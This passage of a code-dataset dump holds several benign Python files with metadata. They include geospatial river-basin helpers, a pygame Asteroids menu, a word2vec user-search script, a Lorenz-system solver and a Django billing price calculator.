"alurin/gvm", "sub_path": "gvm/language/scanner.py", "file_name": "scanner.py", "file_ext": "py", "file_size_in_byte": 5457, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gvm.language.grammar.TokenID", "line_number": 18, "usage_type": "name"}, {"api_name": "gvm.language.grammar.TokenID", "line_number": 19, "usage_type": "name"}, {"api_name": "gvm.language.grammar.Grammar", "line_number": 21, "usage_type": "name"}, {"api_name": "gvm.locations.Location", "line_number": 26, "usage_type": "call"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.Iterator", "line_number": 30, "usage_type": "name"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 30, "usage_type": "name"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 58, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 38, "usage_type": "name"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 80, "usage_type": "name"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 80, "usage_type": "name"}, {"api_name": "gvm.language.grammar.Grammar", "line_number": 92, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 101, "usage_type": "call"}, {"api_name": "gvm.locations.Location", 
"line_number": 146, "usage_type": "call"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 149, "usage_type": "call"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 153, "usage_type": "call"}, {"api_name": "typing.Iterator", "line_number": 100, "usage_type": "name"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "18331046548", "text": "import os, sys, re\nfrom pathlib import Path\nimport numpy as np, pandas as pd\n\nimport pdb\nfrom inspect import getmro\nfrom typing import Union, Iterable, Collection\n\nfrom shapely.geometry import Polygon, Point\n\n# if sys.version_info <= (3,5):\ntry:\n import geopandas as gpd\n import apls_tools # dependent on geopandas inside itself\nexcept ImportError: # will be 3.x series\n pass\n\n###############################################################################\n### Add this file's path ###\n###############################################################################\nfile_dir = os.path.dirname(os.path.realpath(__file__))\n# file_dir = os.path.dirname(os.path.realpath('.'))\nprint(\"Importing: \", file_dir)\n\nif file_dir not in sys.path:\n sys.path.insert(0, file_dir)\n print(f\"Added {str(file_dir)} to sys.path\")\n \n \n###############################################################################\n### Import my modules ###\n###############################################################################\nfrom utils import nprint\nfrom geo_helpers import bounds2poly, crop_gdf_to_bounds, get_polys_at_lonlat\n\n\n###############################################################################\n### Helpers ###\n###############################################################################\ndef load_river_csvs(csv_dir):\n \"\"\"\n Given a directory containing csv files with the same header,\n returns a pd.DataFrame of concatenated csvs with a single header\n \"\"\"\n if isinstance(csv_dir, str):\n csv_dir = Path(csv_dir).absolute()\n fns = [p for p in csv_dir.iterdir() if p.suffix == '.csv']\n dfs = []\n for fn in fns:\n dfs.append(pd.read_csv(fn))\n data = pd.concat(dfs)\n data.reset_index(inplace=True)\n data.drop('index', axis=1, inplace=True)\n data['Time'] = data.Time.astype('datetime64[ns]')\n return data\n \n \ndef select_gdf_at_lonlat(gdf, lon, lat):\n \"\"\"\n Returns a new GeoDataFrame that intersects with the point at lon, lat\n \"\"\"\n p = Point(lon,lat)\n gdf_selected = gdf[gdf.intersects(p)]\n return gdf_selected\n\n \n\ndef get_basin_id(basin_data: gpd.GeoDataFrame, \n lon: float, \n lat: float):\n \n gdf_selected = select_gdf_at_lonlat(basin_data,lon,lat)\n if len(gdf_selected) > 0:\n return gdf_selected['HYBAS_ID'].item()\n else:\n return None\n \ndef select_gdf_in_basin(gdf: gpd.GeoDataFrame, \n basin_data: gpd.GeoDataFrame,\n basin_id:str, \n basin_id_col='HYBAS_ID',\n verbose=False):\n \n gdf_basin = basin_data[basin_data[basin_id_col] == basin_id]\n bounds = gdf_basin.total_bounds\n gdf_selected = crop_gdf_to_bounds(gdf, bounds, remove_empty=True)\n \n if verbose:\n print(len(gdf_selected), len(gdf_selected.groupby(['Longitude', 'Latitude'])))\n \n return gdf_selected", "repo_name": "mintproject/MINT-GeoViz", "sub_path": "examples/utils/river_helpers.py", "file_name": "river_helpers.py", "file_ext": "py", "file_size_in_byte": 2933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": 
"os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 51, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 62, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 68, "usage_type": "attribute"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 78, "usage_type": "attribute"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 79, "usage_type": "attribute"}, {"api_name": "geo_helpers.crop_gdf_to_bounds", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "20935609641", "text": "\r\nimport pygame\r\nimport sys\r\n\r\n\r\n\r\npygame.init()\r\n\r\ndef menu(estado):\r\n #Criação\r\n tela = pygame.display.set_mode((600,400),0,32)\r\n\r\n #Fontes\r\n fonte1 = pygame.font.Font(None, 64)\r\n fonte2 = pygame.font.Font(None, 40)\r\n titulo = fonte1.render(\"Asteroids\",1,(255,255,255))\r\n F_new_game = fonte2.render(\"New Game\",1,(255,255,255))\r\n F_ajuda = fonte2.render(\"Help\",1,(255,255,255))\r\n F_sair = fonte2.render(\"Exit\",1,(255,255,255))\r\n\r\n #Imagens\r\n imagem = pygame.image.load(\"background.jpg\")\r\n fundo = pygame.transform.scale(imagem,(700,500))\r\n \r\n while estado:\r\n # x- Sair\r\n for evento in pygame.event.get():\r\n if evento.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n # New Game\r\n if evento.type == pygame.MOUSEBUTTONDOWN:\r\n if pygame.mouse.get_pressed() == (1,0,0):\r\n x,y = pygame.mouse.get_pos()\r\n if (x > 240 and x < 380) and (y > 130 and y < 155):\r\n import Jogo\r\n estado = False\r\n #Help\r\n if evento.type == pygame.MOUSEBUTTONDOWN:\r\n if pygame.mouse.get_pressed() == (1,0,0):\r\n x,y = pygame.mouse.get_pos()\r\n if (x > 280 and x < 345) and (y > 170 and y < 200):\r\n return \"ajuda\"\r\n estado = False\r\n #Sair \r\n if evento.type == pygame.MOUSEBUTTONDOWN:\r\n if pygame.mouse.get_pressed() == (1,0,0):\r\n x,y = pygame.mouse.get_pos()\r\n if (x > 280 and x < 340) and (y > 205 and y < 240):\r\n return \"sair\"\r\n estado = False\r\n \r\n tela.blit(fundo,(0,0))\r\n tela.blit(titulo,(200,60))\r\n tela.blit(F_new_game,(240,130))\r\n tela.blit(F_ajuda,(280,170))\r\n tela.blit(F_sair,(280,215))\r\n pygame.display.flip()\r\n\r\ndef ajuda(estado):\r\n #Criação\r\n tela = pygame.display.set_mode((785,600),0,32)\r\n\r\n #Fontes\r\n fonte1 = pygame.font.Font(None,30)\r\n voltar = fonte1.render(\"Voltar\",1,(255,255,255))\r\n \r\n #Imagens\r\n imagem = pygame.image.load(\"ajuda.jpg\")\r\n fundo = pygame.transform.scale(imagem,(800,600))\r\n \r\n while estado:\r\n # x - sair\r\n for evento in pygame.event.get():\r\n if evento.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n #Sair\r\n if evento.type == pygame.MOUSEBUTTONDOWN:\r\n if pygame.mouse.get_pressed() == (1,0,0):\r\n x,y = pygame.mouse.get_pos()\r\n if (x > 220 and x < 280) and (y > 300 and y < 320):\r\n pygame.quit()\r\n sys.exit()\r\n #Menu\r\n if evento.type == pygame.MOUSEBUTTONDOWN:\r\n\r\n if pygame.mouse.get_pressed() == (1,0,0):\r\n x,y = pygame.mouse.get_pos()\r\n if (x > 550 and x < 620) and (y > 550 and y < 600):\r\n return 
\"menu\"\r\n estado = False\r\n \r\n tela.blit(fundo,(0,0))\r\n tela.blit(voltar,(560,550))\r\n pygame.display.flip()\r\ndef jogo(estado):\r\n \r\n #Criação\r\n tela = pygame.display.set_mode((600,400),0,32)\r\n\r\n #Fontes\r\n fonte1 = pygame.font.Font(None, 20)\r\n voltar = fonte1.render(\"Voltar\",1,(255,255,255))\r\n \r\n #Imagens\r\n imagem = pygame.image.load(\"ajuda.jpg\")\r\n fundo = pygame.transform.scale(imagem,(600,600))\r\n \r\n while estado:\r\n for evento in pygame.event.get():\r\n if evento.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n \r\n tela.fill((0,0,0))\r\n pygame.display.flip()\r\n \r\nporta = \"menu\"\r\n\r\nwhile porta == \"menu\":\r\n porta = menu(True)\r\n if porta == \"sair\":\r\n pygame.quit()\r\n sys.exit()\r\n while porta == \"ajuda\":\r\n porta = ajuda(True)\r\n while porta == \"jogo\":\r\n porta = jogo(True)\r\n", "repo_name": "GabrielFerraroDev/Pygame", "sub_path": "Xabalu/menu base.py", "file_name": "menu base.py", "file_ext": "py", "file_size_in_byte": 4155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 48, "usage_type": "attribute"}, 
{"api_name": "pygame.display.flip", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 83, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 88, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 100, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 108, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 113, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 114, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 124, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 125, "usage_type": "call"}]} +{"seq_id": 
"73989201444", "text": "import numpy as np\nfrom gensim.models import word2vec\n\nDir_path = '../data'\n# Dir_path = 'final'\n\ndef readData():\n\t### load all word count\n\tallWordCount = np.load( Dir_path + '/' + 'allWordCount1.npy')\n\n\t### load all word list\n\twith open (Dir_path + '/' + 'allWordList1.txt', encoding='utf-8') as f:\n\t\tallWordList = f.read().splitlines()\n\tf.close()\n\n\t### load user and their word\n\tuserID = []\n\tuserWord = []\n\tallWordSet = set()\n\twith open(Dir_path + '/' + 'sortedDic', encoding='utf-8') as f:\n\t\tlines = f.read().splitlines()\n\t\tfor line in lines:\n\t\t\tline = line.split(',')\t\n\t\t\tuserID.append(line[0])\n\t\t\tuserWord.append(line[1].split())\n\t\t\tfor w in line[1].split():\n\t\t\t\tallWordSet.add(w)\n\tf.close()\n\n\t# print('save all word list')\n\t# allWordList = list(allWordSet)\n\t# with open(Dir_path + '/' + 'allWordList.txt', 'w', encoding='utf-8') as f:\n\t# \tfor w in allWordList:\n\t# \t\tf.write(w + '\\n')\n\t# f.close()\n\t# print(len(allWordList))\n\n\t### load chosen word\n\t# with open(Dir_path + '/' + 'chosenWord.txt', encoding='utf-8') as f:\n\t# \tchosenWord = f.read().splitlines()\n\n\t### load topic word\n\t# topicList = []\n\t# with open(Dir_path + '/' + 'topicWord.txt', encoding='utf-8') as f:\n\t# \tlines = f.read().splitlines()\n\t# \tfor line in lines:\n\t# \t\ttopicList.append(line.split())\n\t\n\t### build word dictionary\n\t# wordDic = {}\n\t# for i, topic in enumerate(topicList):\n\t# \tfor j, word in enumerate(topic):\n\t# \t\tif word not in wordDic.keys():\n\t# \t\t\twordDic[word] = [i, j]\n\t# \t\telse:\n\t# \t\t\tif wordDic[word][1] > j:\n\t# \t\t\t\twordDic[word] = [i, j]\n\n\t### all word count\n\t# allWordCount = np.zeros([len(userID), len(allWordList)])\n\t# for i, wordList in enumerate(userWord):\n\t# \tfor word in wordList:\n\t# \t\tj = allWordList.index(word)\n\t# \t\tallWordCount[i, j] += 1\n\t# np.save('allWordCount.npy', allWordCount)\n\n\treturn allWordCount, allWordList, userID, userWord\n\ndef returnList_org(query):\n\n\t### check chosenWord\n\t# find query id\n\tif query not in allWordList:\n\t\treturnList = 'Sorry, not found'\n\telse:\n\t\tqueryID = allWordList.index(query)\n\t\ttargetList = allWordCount[:, queryID]\n\t\t\n\t\tindexList = (-targetList).argsort()\n\t\treturnList = []\n\t\tfor i in range(20):\n\t\t\tif(targetList [indexList[i]] > 0):\n\t\t\t\treturnList.append(userID[indexList[i]])\n\t\t\t\t# print(userID[indexList[i]],targetList [indexList[i]])\n\t\t\telse:\n\t\t\t\tbreak\n\n\treturn returnList\ndef returnList(query):\n ### check chosenWord\n # find query id\n model = word2vec.Word2Vec.load(Dir_path + '/' + '/200_10.model.bin')\n if query not in model.wv.vocab:\n returnList = 'Sorry, not found'\n else:\n wordList = [(query,2)]\n wordList.extend(model.most_similar(query))\n score = np.zeros(len(userID))\n\n queryIDList = []\n\n for word in wordList:\n print (word)\n wordID = allWordList.index(word[0])\n queryIDList.append(wordID)\n\n for i, wordID in enumerate(queryIDList):\n weight = wordList[i][1]\n # weight = 11 - i\n # print (weight)\n score = score + np.array(allWordCount[:, wordID]) * weight\n\n # targetList = allWordCount[:, queryID]\n # indexList = (-targetList).argsort()\n\n indexList = (-score).argsort()\n returnList = []\n for i in range(20):\n if score[indexList[i]] > 0:\n returnList.append(userID[indexList[i]])\n # print(userID[indexList[i]],score[indexList[i]])\n else:\n break\n\n return returnList\n\ndef main():\n\tglobal allWordCount, allWordList, 
userID, userWord\n\tprint('reading datas...')\n\tallWordCount, allWordList, userID, userWord = readData()\n\n\t### assume query is a single word\n\t# print('Please type your query')\n\t# query = input()\n\t# ans = returnList(query)\n\t# ans = returnList_org(query)\n\t# print(ans)\n\t# return ans\n\t# a = [1, 3, 5, 7]\n\t# print(a.index(6))\n\n\n# if __name__ == '__main__':\n# \tmain()", "repo_name": "kevinisbest/Dazzled-Darling", "sub_path": "src/returnUserList.py", "file_name": "returnUserList.py", "file_ext": "py", "file_size_in_byte": 3867, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.load", "line_number": 9, "usage_type": "call"}, {"api_name": "gensim.models.word2vec.Word2Vec.load", "line_number": 92, "usage_type": "call"}, {"api_name": "gensim.models.word2vec.Word2Vec", "line_number": 92, "usage_type": "attribute"}, {"api_name": "gensim.models.word2vec", "line_number": 92, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "24566052374", "text": "import numpy as np\nfrom scipy.integrate import odeint\nfrom random import random\n\nrho = 28.0\nsigma = 10.0\nbeta = 8.0 / 3.0\n\ndef f(state, t):\n x, y, z = state # Unpack the state vector\n return sigma * (y - x), x * (rho - z) - y, x * y - beta * z # Derivatives\n\ndef export_states():\n state0 = [1.0*random()*2-1, 1.0*random()*2-1, 1.0*random()*2-1]\n t = np.arange(0.0, 1000.0, 0.01)\n\n states = odeint(f, state0, t)\n return states", "repo_name": "Noverdi/lorenz_system_visualization", "sub_path": "lorenz_system.py", "file_name": "lorenz_system.py", "file_ext": "py", "file_size_in_byte": 445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.random", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.integrate.odeint", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "31708830896", "text": "import logging\nfrom typing import Optional\n\nimport moneyed\nfrom django.apps import apps\n\nfrom billing.lib.utils import clsfstr\n\nfrom .rates import convert_money\n\nCURRENCIES_CODES = moneyed.CURRENCIES.keys()\n\n\ndef get_currency_by_country(country) -> Optional[moneyed.Currency]:\n country = get_country_by_tld_or_name(country)\n names = [country.name_en.upper()]\n names += [x.upper() for x in country.alternate_names.split(',')]\n\n for code, currency in moneyed.CURRENCIES.items():\n for name in names:\n if name in currency.countries:\n return currency\n return None\n\n\ndef get_country_by_tld_or_name(country):\n country_model = apps.get_model('hotels.Country')\n try:\n if country and str(country).isnumeric() and not isinstance(\n country, country_model):\n country = country_model.objects.get(pk=country)\n elif country and not str(country).isnumeric() and not isinstance(\n country, country_model):\n country = country_model.objects.filter(tld=country).first()\n except country_model.DoesNotExist:\n country = None\n\n return country\n\n\nclass CalcException(Exception):\n pass\n\n\nclass CalcByQantityPeriodCountry(object):\n \"\"\"\n Calculate the service price by the period, country and quantity\n \"\"\"\n\n def __init__(self, period: int, period_units: str, quantity: int,\n country: str) -> None:\n self.period = period\n self.period_units = period_units\n 
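The returnUserList.py record above expands a query with model.most_similar(query) and sums each user's word counts weighted by similarity. A sketch of that scoring step in isolation, assuming a (n_users, n_words) count matrix and a word-to-column dict; score_users is an illustrative name. Note that most_similar on the model object (and model.wv.vocab) is the pre-gensim-4 API; current gensim exposes the lookup as model.wv.most_similar.

import numpy as np

def score_users(count_matrix, word_index, sim_pairs):
    """Weight each user's term counts by word2vec similarity.

    count_matrix: (n_users, n_words) array of raw counts
    word_index:   dict mapping word -> column index (avoids list.index in a loop)
    sim_pairs:    [(word, weight), ...], e.g. [(query, 2.0)] + most_similar output
    """
    scores = np.zeros(count_matrix.shape[0])
    for word, weight in sim_pairs:
        col = word_index.get(word)
        if col is not None:          # expansion words can be missing from the corpus
            scores += count_matrix[:, col] * weight
    return (-scores).argsort()       # user row indices, best match first

The original looks words up with allWordList.index(word), which scans the whole vocabulary per word; a prebuilt dict makes each lookup O(1).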
self.quantity = quantity\n self.country = get_country_by_tld_or_name(country)\n self.services = [] # type: list\n\n def get_prices(self):\n self._fill_services_for_calcualtion()\n prices = self._calc_services()\n\n if not len(prices):\n raise CalcException('Prices are empty')\n\n return prices\n\n def _fill_services_for_calcualtion(self):\n service_model = apps.get_model('finances.Service')\n if self.period:\n service = service_model.objects.get_by_period(\n service_type='rooms',\n period=self.period,\n period_units=self.period_units,\n )\n if not service:\n raise CalcException('Service not found.')\n self.services.append(service)\n else:\n self.services = service_model.objects.get_all_periods(\n service_type='rooms',\n period_units=self.period_units,\n )\n\n def _get_local_price(self, price: moneyed.Money) -> moneyed.Money:\n \"\"\"\n Get the local price according to the country currency\n \"\"\"\n currency = getattr(self.country, 'currency')\n if currency and currency != price.currency:\n return convert_money(price, currency)\n return price\n\n def _calc_services(self) -> list:\n prices = []\n for service in self.services:\n price = Calc.factory(service).calc(\n quantity=self.quantity, country=self.country)\n price_local = self._get_local_price(price)\n prices.append({\n 'status':\n True,\n 'price':\n price.amount,\n 'price_currency':\n price.currency.code,\n 'period':\n service.period,\n 'price_local':\n price_local.amount if price_local else None,\n 'price_currency_local':\n price_local.currency.code if price_local else None\n })\n\n return prices\n\n\nclass CalcByQuery(CalcByQantityPeriodCountry):\n \"\"\"\n Calculate the service price by the query serializer\n \"\"\"\n\n def __init__(self, query: dict) -> None:\n super().__init__(\n query.get('period'),\n query.get('period_units'),\n query.get('quantity'),\n query.get('country'),\n )\n\n\nclass Calc(object):\n \"\"\"\n Calc abstract class\n \"\"\"\n\n def __init__(self, entry):\n if isinstance(entry, apps.get_model('clients.ClientService')):\n self.client_service = entry\n self.quantity = entry.quantity\n self.country = entry.client.country\n self.service = self._get_service(entry)\n\n @staticmethod\n def _get_service(entry):\n \"\"\"\n Get service object by id\n \"\"\"\n if isinstance(entry, apps.get_model('clients.ClientService')):\n service = entry.service\n elif isinstance(entry, apps.get_model('finances.Service')):\n service = entry\n else:\n service = apps.get_model('finances.Service').objects.get(pk=entry)\n return service\n\n @staticmethod\n def factory(entry, country=None):\n \"\"\"\n Factory method (entry - Service or ClientService or int)\n \"\"\"\n service = Calc._get_service(entry)\n class_name = service.type.title().replace('_', '')\n\n return clsfstr('finances.lib.calc', class_name)(entry)\n\n def calc(self, quantity=None, country=None):\n \"\"\"\n Calc price\n \"\"\"\n if not quantity:\n quantity = getattr(self, 'quantity', None)\n\n country = self._get_country(country)\n\n if not quantity or not country:\n raise CalcException('Invalid country or quantity.')\n\n prices = list(\n apps.get_model('finances.Price').objects.filter_by_country(\n country, self.service))\n if not prices:\n raise CalcException('Empty prices.')\n\n total = self._do_calc_total_price(prices, quantity)\n self._log_calc_result(total, prices, country, quantity)\n\n return total\n\n def _get_country(self, country):\n \"\"\"\n Polymorph getting of country\n \"\"\"\n country = get_country_by_tld_or_name(country)\n if not country:\n country = 
getattr(self, 'country', None)\n\n return country\n\n def _do_calc_total_price(self, prices, quantity):\n \"\"\"\n Calculate price based on prices table and quantity\n \"\"\"\n table = []\n default = [d for d in prices if d.for_unit]\n\n for r in range(1, quantity + 1):\n p = [\n p for p in prices\n if (p.period_from is None or p.period_from <= r) and (\n p.period_to is None or p.period_to >= r)\n ]\n if p and not p[0].for_unit and p[0] in table:\n p[0] = 0\n if not p:\n p.append(default[0] if default else 0)\n table.append(p[0])\n\n total = 0\n for item in table:\n total += getattr(item, 'price', 0)\n return total\n\n def _log_calc_result(self, total, prices, country, quantity):\n \"\"\"\n Log the result of calculation\n \"\"\"\n template = \"\"\"\n'Calc result: {}. Prices: {}. Country: {}. \\\nQuantity: {}. Service: {}.'\n \"\"\"\n logging.getLogger('billing').info(\n template.format(\n total,\n prices,\n country,\n quantity,\n self.service,\n ))\n\n\nclass Rooms(Calc):\n \"\"\"\n Calc rooms service\n \"\"\"\n pass\n\n\nclass Other(Calc):\n \"\"\"\n Calc other service\n \"\"\"\n pass\n", "repo_name": "webmalc/maxibooking-billing-django", "sub_path": "finances/lib/calc.py", "file_name": "calc.py", "file_ext": "py", "file_size_in_byte": 7279, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "moneyed.CURRENCIES.keys", "line_number": 11, "usage_type": "call"}, {"api_name": "moneyed.CURRENCIES", "line_number": 11, "usage_type": "attribute"}, {"api_name": "moneyed.CURRENCIES.items", "line_number": 19, "usage_type": "call"}, {"api_name": "moneyed.CURRENCIES", "line_number": 19, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 14, "usage_type": "name"}, {"api_name": "moneyed.Currency", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.apps.apps.get_model", "line_number": 27, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 27, "usage_type": "name"}, {"api_name": "django.apps.apps.get_model", "line_number": 68, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 68, "usage_type": "name"}, {"api_name": "moneyed.Money", "line_number": 84, "usage_type": "attribute"}, {"api_name": "rates.convert_money", "line_number": 90, "usage_type": "call"}, {"api_name": "django.apps.apps.get_model", "line_number": 137, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 137, "usage_type": "name"}, {"api_name": "django.apps.apps.get_model", "line_number": 148, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 148, "usage_type": "name"}, {"api_name": "django.apps.apps.get_model", "line_number": 150, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 150, "usage_type": "name"}, {"api_name": "django.apps.apps.get_model", "line_number": 153, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 153, "usage_type": "name"}, {"api_name": "billing.lib.utils.clsfstr", "line_number": 164, "usage_type": "call"}, {"api_name": "django.apps.apps.get_model", "line_number": 179, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 179, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 231, "usage_type": "call"}]} +{"seq_id": "35970320826", "text": "from abc import ABC\n\nimport StockData.StockDataHolder\nfrom IndicatorsCalculation.IndicatorsClassInterface import IndicatorClassInterface\nfrom matplotlib import pyplot as plt\n\n\nclass 
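The tier resolution in Calc._do_calc_total_price above is easy to misread, so here is a self-contained restatement under stated assumptions: TierPrice is an illustrative stand-in for the finances.Price model, and the intended rule is that the first price whose [period_from, period_to] range covers the unit wins, a non-per-unit price is charged at most once, and uncovered units fall back to the for_unit default. This is a sketch of the same arithmetic on plain data, not the project's implementation.

from dataclasses import dataclass
from typing import Optional

@dataclass
class TierPrice:                     # illustrative stand-in for finances.Price
    price: int
    period_from: Optional[int] = None
    period_to: Optional[int] = None
    for_unit: bool = False

def total_price(prices, quantity):
    """Restates Calc._do_calc_total_price on plain data."""
    default = next((p for p in prices if p.for_unit), None)
    total, charged = 0, set()
    for unit in range(1, quantity + 1):
        match = next((p for p in prices
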